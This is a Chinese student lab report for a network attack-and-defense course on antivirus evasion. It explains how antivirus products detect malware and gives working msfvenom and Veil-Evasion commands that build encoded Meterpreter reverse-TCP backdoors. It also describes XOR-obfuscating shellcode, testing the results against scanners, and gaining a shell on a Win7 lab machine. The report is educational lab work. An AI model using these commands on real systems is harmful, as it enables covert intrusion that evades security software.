20144303 石宇森 《网络对抗技术》免杀原理与实践

20144303 石宇森 《网络对抗技术》免杀原理与实践

一、基础问题回答

（1）杀软是如何检测出恶意代码的？

1、基于特征码检测：每个程序都会有一段特征码，或者说是一段数据。杀毒软件可以检测某个程序的特征码是否包含恶意代码的特征码，以此来判定是否为恶意代码

2、启发式检测：杀毒软件检测某个程序在系统中做的事情，是不是恶意代码做的事情。以此来判断是不是恶意代码

3、基于行为的检测：也是启发式的一种，可以理解为加了监控模式的启发式检测

（2）免杀是做什么？

让恶意代码安全通过杀毒软件的检测，不被查出

（3）免杀的基本方法有哪些？

1、针对杀软基于特征码的检测方法，可以改变或者隐藏恶意代码的特征码。所以可以用到加壳或者是多次编码以改变特征码等方法

2、针对杀软启发式的检测方法，可以改变恶意代码的行为。尽量使用反弹式连接，对通讯隧道进行加密，或者是减少对系统的操作，尽量对内存进行操作。

二、实践总结与体会

通过这次亲自动手实践，掌握了恶意代码如何躲避杀毒软件和防火墙检测的方法，深刻体会到了病毒程序的恐怖。在信息化的时代，黑客们要想将病毒注入到广大用户的计算机中，就如同探囊取物一样。所以，我们还是要从根源杜绝病毒的侵入，尽量不下载来路不明的软件，不打开乱七八糟的网站。

同时，也发现了有很多杀毒软件真的没什么作用，就连我们用的最基本的恶意代码都检测不出来。好像只是来偷取用户信息的.....

三、离实战还缺什么技术或步骤

1、首先，这个实验是在两台计算机相互ping的同的基础上完成的。所以要想达到实战效果，应该先解决这个问题

2、要解决如何把恶意代码传到靶机的问题。可以把其附加在某个软件或者挂到网站上。

3、我们这样生成的恶意代码，还是会被有些杀毒软件检测到，要想完全做到免杀，还需要更加高明的办法。

四、实践过程记录

1、用msfvenom直接生成后门

方法同后门那个实践中的方法一样。

在360检测下查出了病毒：

2、使用编码器对恶意代码进行一次编码

输入指令：
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.75.128 LPORT=4303 -f exe > 20144303ms2.exe对恶意代码进行一次编码，生成新的恶意代码20144303ms2。

没有通过杀软的检测：

3、使用编码器对恶意代码进行十次编码

输入指令：
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.75.128 LPORT=4303 -f exe > 20144303ms3.exe对恶意代码编码10次，生成新的恶意代码20144303ms3。

同样也没能通过检测：

4、使用Veil-Evasion生成可执行文件

输入指令：veil-evasion打开veil-evasion

使用命令：use python/meterpreter/rev_tcp

设置IP和端口：set LHOST 192.168.75.128和set LPORT 4303

进入到generate界面，输入新生成文件的名字20144303ms4，然后选择1使用phthon来编写

用Python编译一个文件（名字ms41是因为第一次进行编译时失败了，名字重复，所以它自动生成了20144303ms41）

虽然废了很大的功夫，但是也没能通过360的查杀：

5、利用shellcode编程

首先，生成一段shellcode代码

将自己生成的shellcode代码加入到老师给的程序中，编译出来一个恶意代码程序。对其进行检测。360没有检测出它是一个恶意代码。

6、对shellcode进行异或和加算法

在vc中利用两个函数对shellcode进行+1和异或操作(具体代码就不贴出来了)

生成的两段新的shellcode如下：

将其编译后生成新的恶意代码程序。用360检测都安全通过

为了比较其具体的免杀效果，我把这两个程序放到了http://www.virscan.org/上进行检测。发现异或后的恶意代码免杀效果更好一些。(很奇怪的是我在电脑上用360手动扫描，没有检测出恶意代码。但是在网站上测试的时候，显示奇虎360报出了查毒......)

基本上实现了免杀后，要对它的功能进行测试，不能进行攻击的话就相当于白做了..... 但我的恶意代码经过了实践的考验，完成了攻击。获取了win7的shell，并截取了它的屏幕